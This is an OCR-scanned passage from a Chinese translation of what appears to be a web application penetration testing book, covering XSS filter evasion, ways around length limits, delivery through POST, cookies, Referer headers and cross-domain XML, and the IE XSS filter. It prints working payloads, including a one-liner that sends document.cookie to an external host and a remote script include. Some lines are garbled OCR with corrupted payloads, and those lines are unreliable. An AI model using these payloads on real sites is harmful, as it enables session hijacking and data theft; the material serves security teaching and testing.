符 。 或 者 ， 如 果 应 用 程序 从 输入 中 删除 <script> 标 签 ， 则 可 以 通过 适当 
的 事件 处 理 程序 使 用 其 他 标签 。 这 时 ， 测 试 员 应 考虑 采用 之 前 介绍 的 用 
于 避 开 基于 签名 的 过 滤 的 各 种 技巧 ， 包 插 多 层 编码 、 空 字 节 、 非 标准 语 
法 以 及 经 过 模糊 处 理 的 脚本 代码 。 通 过 以 上 述 各 种 方式 修改 输入 ， 就 可 
以 设计 出 不 包含 任何 被 过 滤 净 化 的 字符 或 表达 式 的 攻击 ， 因 而 能 够 成 功 
避 开 过 滤 。 

如 果 只 有 使 用 已 被 净化 的 输入 才能 实施 攻击 ， 这 时 束 需 要 测试 净化 
过 滤 的 效率 ， 以 确定 是 否 可 找到 任何 避 开 过 滤 的 方法 。 

如 第 2 章 所 述 ， 净 化 过 滤 中 往往 存在 一 些 错误 。 一 些 字 符 串 操作 API 
包含 仅 蔡 换 第 一 个 匹配 的 表达 式 实例 的 方法 ， 有 时 ， 这 些 方法 易于 与 那 
些 蔡 换 所 有 实例 的 方法 相 混 消 。 因 此 ， 如 果 输 入 中 的 <script> 被 删除 ， 
则 应 党 试 以 下 输入 ， 以 查看 是 否 所 有 实例 均 被 删除 : 


<script><script>alert (1)</script> 
在 这 种 情况 下 ， 还 应 检查 过 滤 是 否 以 递归 方式 执行 净化 : 
<scr<script>ipt>alert (1)</script> 


LEIP, MRE TT ABUT BME ER, JU ie E FR DA mK 
BEA BR Z TB) IAP A AS AA LAA Aan, WREE VSM BR 
<script>， 然 后 递归 删除 <object>， 以 下 攻击 或 许 能 够 取得 成 功 : 


<scr<object>ipt>alert (1)</script> 

当 在 现 有 的 一 段 脚 本 中 注入 一 个 引用 字符 串 时 ， 应 用 程序 经 常 在 注 
入 的 引号 字符 前 插入 有 反 斜 线 字符 。 应 用 程序 这 样 做 是 为 了 对 引号 进行 转 
义 ， 阻 止 攻击 者 终止 字符 串 或 注入 任意 脚本 。 在 这 种 情况 下 ， 应 该 始终 
核实 反 斜 线 字 符 本 身 是 否 被 转 义 。 如 果 其 未 被 转 叉 ， 那 么 这 种 过 滤 就 可 
以 轻易 避 开 。 例 如 ， 如 果 能 够 控制 下 面 的 foo 值 : 

var a= "Eco": 
那么 残 可 以 注入 

foo\'; alert(1);// 




















这 段 代 码 生 成 如 下 啊 应 ， 其 中 含有 受 控制 的 脚本 。 注 意 ， 必 须 使 用 
JavaScript 注 释 符 号 /将 剩 下 的 脚本 作为 注释 处 理 ， 防 止 应 用 程序 目 己 的 
字符 串 分 隔 符 造成 语法 错误 。 

Var a = TOON": aLartALy yy" 


MREMEN BST IEM, BRA TARRE, ABA 
击 者 可 以 使 用 以 下 攻击 字符 串 : 


</script><script>alert (1)</script> 


这 样 做 可 废弃 应 用 程序 中 原来 的 脚本 ， 并 在 其 后 注入 一 段 新 的 肢 
本 。 攻 击 之 所 以 能 够 成 功 ， 是 因为 浏览 器 在 解析 植 入 的 JavaScript 之 前 ， 
优先 解析 HTML 标 签 。 


<script>var a = '</script><script>alert (1)</script> 


此 时 ， 虽 然 原 来 的 脚本 中 包含 一 个 错误 ， 但 这 无 关 紧 要 ， 因 为 浏览 
器 会 跳 过 这 个 错误 ， 继 续 执行 注入 的 脚本 。 


Al, yn vw) 

笑 试 访问 
http://mdsec.net/search/48/ 
http://mdsec.net/search/52/ 


YY fem 在 前 面 的 两 个 攻击 中 ， 即 使 攻击 者 能 够 控制 一 段 脚 
本 ， 但 由 于 应 用 程序 对 单 引号 或 双 引 号 进行 了 转 义 ， 他 也 无 法 使 用 
它们 ， 但 可 以 使 用 string.fromCharCode 技 巧 ， 不 用 分 隔 符 创 建 字符 
Hrs 





如 果 注 入 的 脚本 位 于 事件 处 理 程 序 之 内 ， 而 非 完 整 的 脚本 块 ， 则 可 
以 对 引号 进行 HIML 编 码 ， 以 避 开 应 用 程序 的 净化 ， 并 使 受 控制 的 字符 
串 免 于 被 过 小 。 例 如 ， 如 果 可 以 控制 以 下 输入 中 的 foo 值 : 


<a href="#" onclick="var a = '‘£foo"'; 


A 的 引号 和 上 友和 斜 线 ， 则 可 以 成 功 实 施 以 下 攻 


foo&kapos;; alert(1);// 


这 导致 以 下 啊 应 ， 由 于 一 些 浏览 器 在 将 事件 处 理 程序 作为 JavaScript 

执行 之 前 会 执行 HTML 解 码 ， 因 此 该 攻击 取得 成 功 : 
<a href="#" onclick="var a = 'foo&apos;; alert (1)}; 

应 rh eh wea “ae ge 
议 ， 应 注意 以 下 事实 : 在 作为 JavaSrcipt 执 行 之 前 ， 事 件 处 理 器 会 被 
HTML 人 解码。 在 这 种 情况 下 ， 进 行 HTML 编 码 并 不 一 定 能 够 阻止 攻击 。 
攻击 者 甚至 可 以 利用 这 种 方法 避 开 其 他 防御 机 制 。 

6. 突破 长 度 限 制 

当 应 用 程序 把 输入 截 短 为 一 个 固定 的 最 大 长 度 时 ， 有 三 种 建立 攻击 
字符 串 的 方法 。 











— FPA 5 A ste ES 7 YS oe SS aM BEA se AT HE TS BE ES JavaScriptAPI, 
删除 那些 通常 包含 在 内 但 并 不 完全 必要 的 字符 ， 缩 短 攻 击 有 效 载荷 。 例 
如 ， 如 果 注 入 现 有 的 一 段 代 码 ， 下 面 的 28 字 节 命令 将 把 用 户 的 cookie 传 
送 至 主机 名 为 a 的 服务 器 。 





open("//a/"+document.cookie) 


男 外 ， 如 末 直 接 注 入 HTML， 那 么 下 和 面 这 个 30 字 节 的 标签 将 从 主机 
名 为 a 的 服务 器 加 载 并 执行 一 段 脚 本 。 


<script src=http://a></script> 


在 因特网 上 ， 这 些 示例 明显 需要 进行 扩展 ， 在 其 中 包含 一 个 有 效 的 
域名 或 IP 地 址 。 但 是 ， 内 部 企业 网 络 实际 有 可 能 使 用 一 台 WINS 名 为 a 的 
机 需 作 为 接收 服务 器 。 





v 提示 可 以 使 用 Dean Edward 的 JavaScript packer 工 具 
( 见 http://dean.edwards.name/packer/〉 删除 不 必要 的 空白 符 ， 尽 可 
能 地 缩短 某 一 段 脚本 。 这 个 工具 还 可 将 脚本 转换 成 单独 一 行 ， 方 便 
插入 到 一 个 请 求 参 数 中 。 


第 二 种 更 加 强大 的 突破 长 度 限制 的 技巧 是 将 一 个 攻击 有 效 载 集 分 布 
到 几 个 不 同 的 位 置 ， 用 户 控 制 的 输入 在 这 里 插入 到 同一 个 返回 页 面 中 。 
以 下 面 的 URL 为 例 : 
https://wahh-app.com/account.php? 
page_id=244&seed=129402931&mode=normal 
它 将 返回 一 个 包含 以 下 内 容 的 页 面 : 
<input type="hidden" name="page_id" value="244"> 
<input type="hidden" name="seed" value="129402931"> 
<input type="hidden" name="mode" value="normal"> 


假设 应 用 程序 对 每 个 字段 实施 了 长 度 限 制 ， 以 阻止 在 其 中 插入 有 效 
的 攻击 字符 串 。 但 是 攻击 者 仍然 可 以 使 用 以 下 URL 将 一 段 脚本 分 布 到 他 
A lm ei 


https: //myapp fjaccount.php?page_id="><script>/*&seed=*/alert {document 





.cookie) *Emode=*/</script> 


这 个 URL 的 参数 值 植 入 到 页 面 中 后 ， sauna 


<input type="hidden" name="page id" value=""><script>/*"> 
<input type="hidden" name="seed" value=" Re rsa cookie); 
Sut type=" name-"mede" value "*/</script>’ 


Be N 等 同 于 加 粗 显 示 的 部 分 ， 其 中 的 源 代 
人 码 块 已 成 为 JavaScript 注 释 ( 包 含 在 /* 与 */ 之 间 ) ， 因 此 被 浏览 器 忽略 。 
注入 的 脚本 被 执行 ， 就 好 像 它 被 完整 地 插入 到 页 面 的 菜 一 个 位 置 





V 提示 “这 种 将 一 个 攻击 有 效 载荷 分 布 到 几 个 字段 中 的 技巧 ， 
有 时 还 可 用 于 避 开 其 他 类 型 的 防御 过 滤 。 应 用 程序 经 党 对 单独 一 个 
页 面 的 不 同 字段 执行 不 同 的 数据 确认 与 净化 。 在 前 面 的 示例 中 ， 候 
设 page_id 与 mod 参 数 的 最 大 长 度 为 12 个 字符 。 由 于 这 些 字段 如 此 地 
短 ， 因 此 应 用 程序 的 开发 者 没有 对 其 实施 任何 XSS 过 滤 。 另 一 7 
面 ，seed 参 数 的 长 度 没有 限制 ， 因 此 应 用 程序 对 其 实施 严格 的 过 
滤 ， 以 防止 攻击 者 在 其 中 注入 "< 或 > 字符 。 在 这 种 情况 下 ， 尽 管 开 
发 者 实施 了 过 小 ， 但 攻击 者 不 使 用 任何 被 阻止 的 字符 ， 仍 然 能 够 在 
seed 参 数 中 插入 一 段 任意 长 度 的 脚本 ， 因 为 注入 到 周围 字段 中 的 数 
据 可 以 建立 JavaScript 环 境 。 


第 三 种 在 某 些 情况 下 非常 有 效 的 突破 长 度 限 制 的 技巧 是 ， 将 一 个 反 
射 型 XSS 漏 洞 “ 转 换 ? 成 一 个 基于 DOM 的 漏洞 。 例 如 ， 在 最 初 的 反射 型 
XSS 漏 洞 中 ， 如 果 应 用 程序 对 复制 到 返回 页 面 中 的 message 参 数 设 置 长 
度 限 制 ， 那 么 就 可 以 注入 以 下 45 字 市 的 脚本 ， 它 对 当前 URL 中 的 厂 断 字 
FFE (fragment string) 求 值 。 


<script>eval(location.hash.slice(1))</script> 


通过 在 易于 受到 反射 型 XSS 攻 击 的 参数 中 注入 这 上 段 脚本 ， 可 以 在 生 
成 的 页 面 中 造成 一 个 基于 DOM 的 XSS 漏 洞 ， 从 而 执行 位 于 片断 字符 串 中 
的 另 一 段 脚 本 ， 它 不 受 应 过 滤 的 影响 ， ease a 


http:/ /mdse et/err Error .ashx?messaqge-<script>eval (locat .has 
ubstr({(1})</script>#alert[{['long i here 























Dey EB 术 示 例 的 较 短 版 本 ， 此 示例 在 多 数 情况 下 可 以 运行 


http: //mdsec.net/error/5/Frror.ashx?message=<script>eval {unescape (location) ) 


在 这 个 版 本 中 ， 整 个 URL 经 过 URL 解 码 ， 然 后 传递 给 eval 命 令 。 整 
个 URL 将 作为 有 效 的 JavaScript 执 行 ， 因 为 http: 协 议 前 缀 作为 代码 标签 ， 
协议 前 级 后 面 的 / 则 作为 单行 注释 ，% OA 经 过 URL 解 码 后 将 变 为 换行 
符 ， 表 示 结 束 注释 。 

7. 实施 有 效 的 XSS 攻 击 

通常 ， 在 探查 潜在 的 XSS 漏 洞 ， 以 了 解 并 避 开 应 用 程序 的 过 小 机 制 
时 ， 你 往往 是 在 浏览 器 以 外 进行 测试 ， 也 就 是 使 用 Burp Repeater 之 类 的 
工具 重复 发 送 相 同 的 请 求 ， 每 次 对 请 求 进行 略微 修改 ， 然 后 测试 这 种 修 
改 对 啊 应 的 影响 。 某 些 情况 下 ， 在 以 这 种 方式 创建 概念 验证 攻击 后 ， 你 
可 能 还 需要 完成 任务 才能 针对 其 他 应 用 程序 用 户 实 施 有 效 攻 击 。 例 如 ， 
其 他 用 户 的 请 求 中 的 XSS 进 入 点 〈 如 cookie 或 Referer 消 息 头 ) 可 能 难以 
控制 ;或 者 目标 用 户 可 能 使 用 的 是 内 置 了 防范 反射 型 XSS 攻 击 功能 的 浏 
览 句 。 在 这 一 节 中 ， 我 们 将 介绍 你 在 实施 有 效 的 XSS 攻 击 时 可 能 遇 到 的 
各 种 挑战 及 如 何 应 对 这 些 挑战 。 

© 将 攻击 扩展 到 其 他 应 用 程序 页 面 

假如 你 所 确定 的 漏洞 位 于 你 不 感 兴趣 的 应 用 程序 区 域 ， 只 影响 未 经 
过 验证 的 用 户 ， 而 其 他 区 域 则 包含 真正 敏感 的 数据 和 你 希望 攻破 的 功 
能 。 

通常 ， 在 这 种 情况 下 ， 设 计 一 个 可 以 通过 应 用 程序 的 某 个 区 域 中 的 
XSS 漏 洞 传送 ， 并 且 在 用 户 的 浏览 器 中 持续 存在 的 攻击 有 效 载 何 ， 就 可 
以 攻破 同一 个 域 中 的 目标 数据 或 功能 。 

要 实现 上 述 目 的 ， 一 个 简单 的 办 法 是 创建 一 个 包含 整个 浏览 器 窗口 
的 iframe， 然 后 在 该 iframe 中 重新 加 载 当 前 页 面 。 在 用 户 浏 览 站 点 并 登 
录 到 通过 验证 的 区 域 时 ， 注 入 的 脚本 将 始终 在 顶层 窗口 中 运行 。 这 样 ， 
你 就 能 够 钩 住 子 iframe 中 的 导航 事件 和 表单 提交 ， 监 视 iframe 中 显示 的 
所 有 响应 内 容 ， 当 然 也 能 够 在 适当 的 时 候 动 持 用 户 的 会 话 。 在 文 持 
HTML5 的 浏览 占 中 ， 当 用 户 在 页 面 间 移 动 时 ， 脚 本 甚至 可 以 使 用 
window.history.pushState © 函数 在 地 址 栏 中 设置 适当 的 URL。 

请 参阅 以 下 URL 了 解 这 种 攻击 的 一 个 示例 : 

http://blog.kotowicz.net/2010/11/xss-track-how-to-quietly-track- 
whole.html 
































w 错误 观点 “我 们 不 用 担心 站 点 中 未 通过 验证 部 分 的 XSS 漏 


洞 ， 攻 击 者 不 可 能 利用 它们 来 动 持 会 话 。” 

因为 两 方面 的 原因 ， 这 种 看 法 并 不 正确 。 首 先 ， 应 用 程序 未 通 
过 验证 部 分 的 XSS 漏 洞 可 被 攻击 者 用 于 下 接 攻破 验证 用 户 的 会 话 。 
因此 ， 未 通过 验证 部 分 的 反射 型 XSS 漏 洞 比 通过 验证 部 分 的 这 类 漏 
洞 更 严重 ， 因 为 潜在 受害 者 的 范围 更 广 。 其 次 ， 即 使 用 尸 尚未 通过 
验证 ， 攻 击 者 仍然 可 以 通过 提交 儿 个 请 求 ， 在 受害 者 的 浏览 右 中 注 
入 东 种 木马 功能 ， 等 待 用户 登录 ， 然 后 劫持 用 户 的 会 话 。 如 第 13 章 
i 以 JavaScript 编 写 的 键盘 记录 器 来 捕获 
用 户 的 密码 。 


@ 修改 请 求 方法 

假如 你 确定 的 XSS 漏 洞 使 用 POST 请 求 ， 但 实施 攻击 的 最 便捷 的 方 
法 需要 使 用 GET 请 求 一 一 例如 ， 提 交 一 个 论坛 贴 子 ， 其 中 包含 针对 易 受 
攻击 的 URL 的 IMG 标 签 。 

在 这 种 情况 下 ， 我 们 有 必要 进行 判定 ， 如 果 将 POST 请 求 转换 为 
GET 请 求 ， 应 用 程序 是 否 对 请 求 进行 相同 的 处 理 。 许 多 应 用 程序 接受 以 
上 任何 一 种 请 求 。 

在 Burp Proxy, PJ LEH E Fp p EAE RN 
i” (Change Request Method) 命令 将 任何 请 求 在 GET 与 POST 方法 之 间 
切换 。 





本 
过 GET 请 求实 施 攻 击 。” 

如 果 一 个 反射 型 XSS 漏 洞 只 能 使 用 POST 方法 加 以 利用 ， 应 用 
程序 仍然 会 党 到 各 种 攻击 传送 机 制 的 影响 ， 包 括 使 用 恶意 第 三 方 
Web 站 点 的 传送 机 制 |。 


有 时 ， 把 使 用 GET 方 法 的 攻击 转换 成 使 用 POST 方法 的 攻击 可 能 会 
避 开 某 些 过 滤 。 许 多 应 用 程序 在 整个 应 用 程序 中 执行 某 种 常规 过 滤 ， 阻 
止 已 知 的 攻击 字符 串 。 如 果 一 个 应 用 程序 希望 收 到 使 用 GET 方 法 的 请 
求 ， 它 可 能 只 对 URL 碍 询 字 符 串 执行 这 种 过 滤 。 将 请 求 转换 为 使 用 
POST 方法 就 可 以 完全 避 开 这 种 过 滤 。 

@ 通过 cookie 利 用 XSS 漏 洞 

一 些 应 用 程序 包含 反射 型 XSS 漏 洞 ， 攻 击 这 种 漏洞 的 进入 点 在 请 求 
cookie 中 。 在 这 种 情况 下 ， 可 以 通过 各 种 技巧 来 利用 这 种 漏洞 : 


口 和 修改 请 求 一 样 ， 应 用 程序 可 能 允许 你 使 用 与 cookie 同 名 的 URL 
或 主体 参数 来 触发 漏 洞 。 

口 如 果 应 用 程序 包含 任何 可 用 于 直接 设置 cookie 值 的 功能 (例如 ， 
基于 提交 的 参数 值 设 置 cookie 的 首选 项 页 面 )， 则 你 可 以 设计 一 个 跨 站 
点 请 求 伪 造 攻击 ， 在 受害 者 的 浏览 器 中 设置 所 需 的 cookie。 然 后 ， 再 诱 
使 受害 者 提出 以 下 两 个 请 求 : 其 中 一 个 请 求 用 于 设置 包含 XSS 有 效 载 伍 
Pr ii 的 cookie， 男 一 个 请 求 则 用 于 请 求 以 危险 的 方式 处 理 cookie 值 的 功 
HE o 

口 之 前 ， 人 们 已 经 在 浏览 器 扩展 技术 (如 Flash〉 中 发 现 各 种 漏洞 ， 
这 使 攻击 者 可 以 使 用 任意 HTTP 消 息 头 提交 路 域 请 求 。 当 前 ， 至 少 有 一 
种 此 类 漏洞 广为人知 ， 但 尚未 修复 。 因 此 ， 可 以 利用 浏览 器 插件 中 的 某 
个 这 种 类 型 的 漏洞 来 提交 跨 域 请 求 ， 在 其 中 包含 任意 则 在 触发 漏洞 的 
cookie 消 息 头 。 

口 如 果 上 述 任何 方法 都 无 法 成 功 实 施 攻击 ， 你 可 以 利用 相同 (或 相 
R) 域 中 的 任何 其 他 反射 型 XSS 漏 洞 使 用 所 需 值 设置 一 个 永久 性 
cookie， 持 续 对 受害 用 户 进 行 攻击 。 

@ 通过 Referer 消 息 头 利用 XSS 漏 洞 

一 些 应 用 程序 包含 只 能 通过 Referer 消 息 头 触发 的 XSS 漏 洞 。 利 用 受 
他 们 控制 的 web 服务器 ， 攻 击 者 可 以 相当 轻松 地 利用 这 些 漏洞 。 例 如 ， 
攻击 者 可 以 诱 使 受害 者 请 求 他 们 的 服务 器 上 的 URL， 该 UREL 中 包含 针对 
易于 攻击 的 应 用 程序 的 适当 XSS 有 效 载 集 。 然 后 ， 攻 击 者 的 服务 器 将 返 
回 一 个 啊 应 ， 以 请 求 上 述 URL， 而 攻击 者 的 有 效 载荷 就 包含 在 此 请 求 的 
Referer 消 息 头 中 。 

在 某 些 情况 下 ， 只 有 在 Referer 消 息 头 包含 与 易 受 攻击 的 应 用 程序 同 
属 一 个 域 的 URL 时 ，XSS 漏 洞 才 会 触发 。 这 时 ， 可 以 利用 应 用 程序 中 的 
任何 现成 的 重 定 向 功能 来 实施 攻击 。 为 此 ， 你 需要 构建 一 个 指向 该 重 定 
问 功 能 的 URL， 在 其 中 包含 XSS 攻 击 的 有 效 载 和 荷 ， 并 使 其 重 定 网 到 易于 
攻击 的 URL。 这 种 攻击 能 耕 成 功 ， 取 决 于 该 功能 使 用 的 重 定 同 方法 ， 以 
及 当前 浏览 器 在 进行 上 述 重 定 癌 时 是 否 会 更 新 Referer 消 息 涉 。 

@ 通过 非 标准 请 求 和 响应 内 容 利用 XSS 漏 洞 

目前 ， 有 越 来 越 多 的 复杂 应 用 程序 采用 不 包含 传统 的 请 求 参数 的 
Ajax 请 求 。 而 在 此 前 ， 请 求 通 常 包 售 XML 和 JSON 格 式 的 数据 ， 或 采用 
各 种 序列 化 方案 。 因 此 ， 针 对 这 些 请 求 的 啊 应 往往 包含 同 种 或 其 他 格式 
的 数据 ， 而 不 是 HTML。 

与 这 些 请 求 和 啊 应 相关 的 服务 器 端 功能 大 多 会 表现 出 类 似 于 XSS 的 
人 应 用 程序 会 按 原样 返回 表明 漏洞 确实 存在 的 请 求 有 
MAK ABT o 





























在 这 种 情况 下 ， 仍 然 可 以 利用 这 种 行为 来 实施 XSS 攻 击 。 为 此 ， 需 
要 满足 以 下 两 个 条 件 : 

口 你 需要 想 办 法 使 目标 用 户 提出 所 需 的 跨 域 请 求 ; 

口 你 需要 以 茶 种 方式 操纵 啊 应 ， 以 便 它 在 到 达 浏 览 器 时 执行 你 的 脚 


满足 这 两 个 条 件 并 不 容易 。 首 先 ， 相 关 请 求 通常 由 JavaScript 使 用 
XMLHttpRequest 提 出 (请 参阅 第 3 章 了 解 详细 信息 ) 。 默 认 情况 下 ， 这 
种 方法 并 不 能 用 于 提出 路 域 请 求 。 虽 然 HIML5 正 在 对 XMLHttpRequest 
进行 修改 ， 以 便于 站 点 指定 其 他 可 能 与 它们 交互 的 域 ， 但 是 ， 如 果 你 能 
够 找到 允许 第 三 方 交 互 的 目标 ， 就 可 以 采用 更 简单 的 方法 来 攻破 该 目标 
(请 参阅 第 13 章 了 解 详细 信息 〉。 

其 次 ， 在 任何 攻击 中 ， 应 用 程序 返回 的 啊 应 均 由 受害 者 的 浏览 器 直 
接 处 理 ， 而 不 是 由 定制 脚本 按 原 样 处 理 。 因 此 ， 啊 应 将 包含 任何 非 
HTML 格 式 的 数据 (通常 使 用 对 应 的 Content-Type 消 息 涉 ) 。 在 这 种 情 
况 下 ， 浏 览 器 会 以 针对 这 种 数据 类 型 (如 果 它 识别 该 类 型 的 方式 正 营 
处 理 啊 应 ， 因 而 通过 HTML 注 入 脚本 代码 的 常用 方法 也 可 能 会 失效 。 

尽管 难以 实现 ， 但 在 某 些 情况 下 我 们 仍然 可 以 满足 这 两 个 条 件 ， 从 
而 利用 类 似 于 XSS 的 行为 来 实施 有 效 攻 击 。 下 面 我 们 将 举例 说 明 如 何 使 
用 XML 数据 格式 来 实施 攻击 。 

V 传送 跨 域 XML 请求 

使 用 HTML 表 单 〈 将 enctype 属 性 设置 为 textplain) 可 以 在 HTTP 请 
这 将 告诉 浏览 器 按 以 下 方式 处 理 表 单 

口 在 请 求 中 隔行 传送 每 个 参数 ; 

D 使 用 等 号 分 隅 每 个 参数 的 名 称 和 值 和 平和 营 一 样 ) ; 

口 不 对 参数 名 称 或 值 进行 任何 URL 编 码 。 

虽然 某 些 浏览 器 并 不 遵循 这 种 规范 ， 但 当前 版 本 的 Internet 
Explorer、Firefox 和 Opera 都 采用 这 种 规范 。 

上 述 行为 意味 着 ， 只 要 数据 中 至少 包 含 一 个 等 号 ， 你 就 可 以 在 消息 
主体 中 传送 任意 数据 。 为 此 ， 你 需要 将 数据 分 隔 成 两 块 ， 等 号 前 一 块 ， 
等 号 后 一 块 。 然 后 ， 将 第 一 块 数 据 放 在 参数 名 称 中 ， 将 第 二 块 数据 放 在 
参数 值 中 。 这 样 ， 浏 览 器 在 构建 请 求 时 ， 它 会 传送 以 等 号 分隔 的 两 块 数 
据 ， 因 而 实际 上 构建 了 所 需 的 数据 。 

由 于 XML 在 起 始 XML 标 签 的 version 属 性 中 始终 至 少 包含 一 个 等 
号 ， 因 此 ， 我 们 可 以 在 消息 主体 中 使 用 这 种 技巧 跨 域 传送 任意 数据 。 例 
如 ， 如 果 所 需 的 XML 如 下 所 示 : 






































<?xml version="1.0"?><data><param>foo</param></data> 


则 可 以 使 用 以 下 表单 发 送 这 些 数据 : 


<form enctype="text/plain" action="http://wahh-app.com/ vuln.php" 

method="POST"> 

<input type="hidden" name='<?sml version' 

value='"1.0" A > 
orm><script>document. forms[0].submit() ;</seript> 


Be hae Ce 常用 的 攻击 字符 ， 如 标签 尖 括 号 ， 你 需 
要 在 XML 请 求 中 对 这 些 字符 进行 HTML 编 码 。 因 此 ， 在 生成 该 请 求 的 
HTML 表 单 中 ， 你 需要 对 它们 进行 双重 HTML 编 码 。 








VY fem 只 要 你 能 够 将 等 号 合并 到 请 求 中 的 某 个 位 置 ， 束 可 
以 使 用 这 种 技巧 跨 域 提交 几乎 包含 任何 类 型 的 内 容 ( 如 JSON 编 码 
的 数据 和 序列 化 二 进 制 对 象 ) 的 请 求 。 通 常 ， 通 过 修改 请 求 中 可 以 
合 等 号 字符 的 目 由 格式 的 文本 字段 即 可 达到 这 一 目的 。 例 如 ， 在 
下 面 的 JSON 数 据 中 ， 注 释 字 段 被 用 于 注入 所 需 的 等 号 字符 : 














在 使 用 这 种 技巧 时 ， 唯 一 需要 注意 的 地 方 是 ， 生 成 的 请 求 将 包含 以 
下 消息 头 : 


Content-Type: text/plain 


正常 情况 下 ， 根 据 生成 请 求 的 具体 方式 ， 最 初 的 请 求 本 应 包含 一 个 
不 同 的 Content-Type 消 息 头 。 如 果 应 用 程序 接受 提供 的 Content-Type 消 息 
头 并 正常 处 理 消息 主体 ， 则 在 设计 有 效 的 XSS 攻 击 时 就 可 以 使 用 这 种 技 
巧 。 如 果 由 于 Content-Type 消 息 头 已 修改 ， 应 用 程序 无 法 正 稼 处 理 请 
求 ， 则 可 能 没有 办 法 路 域 传送 适当 的 请 求 来 触发 类 似 于 XSS 的 行为 。 





YY ”提示 “如 果 在 包含 非 标准 内 容 的 请 求 中 确定 了 类 似 于 XSS 
的 行为 ， 首 移 应 该 快速 确定 ， 在 将 Content-Type 消 筷 头 更 改 为 





text/plain 后 ， 这 种 行为 是 否 仍然 存在 。 如 果 这 种 行为 不 再 存在 ， 则 
你 不 必 付 出 任何 其 他 努力 来 尝试 设计 有 效 的 XSS 攻 击 。 


V 从 XML 啊 应 中 执行 JavaScript 

在 党 试 利 用 非 标准 内 容 中 的 类 似 于 XSS 的 行为 时 ， 你 需要 殉 服 的 第 
二 个 障碍 是 找到 一 种 操纵 啊 应 的 方法 ， 使 其 在 由 浏览 器 直接 处 理 时 能 够 
执行 你 的 脚本 。 如 果 啊 应 中 包含 错误 的 Content-Type 消 息 头 ， 或 根本 不 
包含 Content-Type 消 奶头 ， 或 者 如 果 输 入 在 啊 应 主体 的 开始 部 分 就 已 反 
射 ， 则 可 以 轻松 克服 这 种 障碍 。 

但 是 ， 啊 应 通 第 都 包含 准确 摘 述 应 用 程序 返回 的 数据 类 型 的 
Content-Type 消 息 头 。 此 外 ， 你 的 输入 大 多 是 在 啊 应 的 中 间 部 分 反射 。 
同时 ， 在 此 位 置 之 前 和 之 后 的 啊 应 内 容 包含 的 数据 遵循 指定 内 容 类 型 的 
相关 规范 。 不 同 浏览 堪 解 析 内 容 的 方式 各 不 相同 。 一 些 浏 览 器 完全 信任 
Content-Type 消 息 头 ， 一 些 浏 览 右 则 会 检查 内 容 本 喘 ， 并 在 具体 的 类 型 
有 所 不 同时 窗 盖 指定 的 类 型 。 但 是 ， 在 这 种 情况 下 ， 无 论 浏览 器 如 何 处 
理 内 容 ， 它 都 不 大 可 能 将 啊 应 作为 HTML 处 理 。 

如 果 可 以 构建 能 够 成 功 执行 脚本 的 啊 应 ， 这 往往 需要 利用 所 注入 的 
内 容 类 型 的 特定 语法 特性 。 幸 好 ， 对 于 XML 而 言 ， 你 可 以 使 用 XML 标 
记 定 义 一 个 映射 为 XHTML 的 新 命名 空间 ， 并 使 浏览 器 将 该 命名 空间 解 
析 为 HTML， 从 而 达到 执行 脚本 的 目的 。 例 如 ， 在 Firefox 处 理 以 下 啊 应 
时 ， 注 入 的 脚本 将 得 以 执行 

HTTP/1.1 200 Ok 

Content-Type: text/xml 


Content-Length: 1098 














<xml> 


<data> 


<a xmlns:a='http://www.w3.org/1999/xhtml1'> 
<a:body onload='alert(1)'/></a> 


</data> 
</xml> 


如 上 所 述 ， 如 果 啊 应 由 浏览 器 直接 处 理 ， 而 不 是 由 通常 处 理 啊 应 的 


原始 应 用 程序 组 件 处 理 时 ， 此 攻击 将 取得 成 功 。 

© 攻击 浏览 器 XSS 过 滤器 

在 利用 几乎 任何 反射 型 XSS 漏 洞 时 总 是 会 遇 到 一 个 障碍 ， 即 各 种 浏 
览 吉 功能 都 针对 XSS 攻 击 为 用 户 提供 了 保护 。Internet Explorer 浏 览 堪 默 
认 包 含 一 个 XSS 过 滤器 ， 其 他 一 些 浏 览 器 也 通过 插件 的 形式 提供 类 似 的 
功能 。 这 些 过 滤器 的 工作 方式 基本 类 似 : 它们 被 动 监视 请 求 和 啊 应 ， 并 
使 用 各 种 规则 来 确定 正在 进行 的 潜在 XSS 攻 击 ， 一 旦 确定 潜在 攻击 ， 整 
修改 啊 应 的 某 些 部 分 来 阻止 这 些 攻 击 。 

如 前 所 述 ， 如 果 可 以 通过 任何 广泛 使 用 的 浏览 器 来 利用 XSS 条 件 ， 
我 们 就 应 将 这 些 条 件 视 为 漏洞 。 而 且 ， 某 些 浏览 右 提供 XSS 过 滤 占 并 不 
意味 着 不 需要 修复 XSS 漏 洞 。 在 某 些 现 实情 况 下 ， 攻 击 者 可 能 恰恰 需要 
通过 包含 XSS 过 小 器 的 浏览 占 来 利用 某 个 漏洞。 此 外 ， 用 于 避 开 XSS 过 
滤 右 的 方法 本 里 也 值得 我 们 关注 。 在 某 些 情况 下 ， 我 们 甚至 可 以 利用 这 
些 方 法 来 实施 通过 别 的 方法 无 法 实施 的 其 他 攻击 。 

在 这 一 节 中 ， 我 们 将 介绍 Internet Explorer 的 XSS 过 滤器 。 目 前 ， 它 
是 最 成 熟 及 应 用 最 广泛 的 过 滤 右 。 

IE XSS 过 滤器 的 核心 功能 如 下 。 

口 检查 跨 域 请 求 中 的 每 一 个 参数 值 ， 以 确定 注入 JavaScript 的 可 能 尝 
试 。 它 会 根据 一 个 背 见 攻击 字符 串 的 基于 正则 表达 式 的 黑 名 单 来 检查 这 
些 值 ， 从 而 完成 这 一 任务 。 
ae re ere ER 


口 如 果 响 应 中 出 现 该 值 ， 则 会 对 响应 进行 净化 ， 以 防止 执行 任何 脚 
本 。 例 如 ， 它 会 将 <script> 修 改 为 <sc#ipt>。 

关于 IE XSS 过 滤器 ， 需 要 指出 的 第 一 个 问题 是 : 大 体 而 言 ， 它 能 够 
有 效 阻 止 利用 XSS 漏 洞 的 标准 攻击 ， 从 而 为 任何 党 试 实施 这 类 攻击 的 攻 
击 者 设置 了 很 大 的 障碍 。 这 意味 着 ， 需 要 通过 某 些 特 定 的 方法 才能 避 开 
这 种 过 滤器 。 此 外 ， 还 可 以 利用 这 种 过 滤器 的 工作 机 制 来 实施 通过 别 的 
方法 无 法 实施 的 其 他 攻击 。 
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口 该 过 滤器 仅 检 查 参 数值 ， 而 不 检查 参数 名 称 。 一 些 应 用 程序 易于 
受到 针对 参数 名 称 的 攻击 ， 如 在 响应 中 回 显 请 求 的 整个 URL 或 整个 查询 
字符 串 。 该 过 滤器 无 法 阻止 这 类 攻击 。 

D 该 过 滤器 单独 检查 每 个 参数 值 。 但 是 ， 如 果 在 同一 个 响应 中 反射 
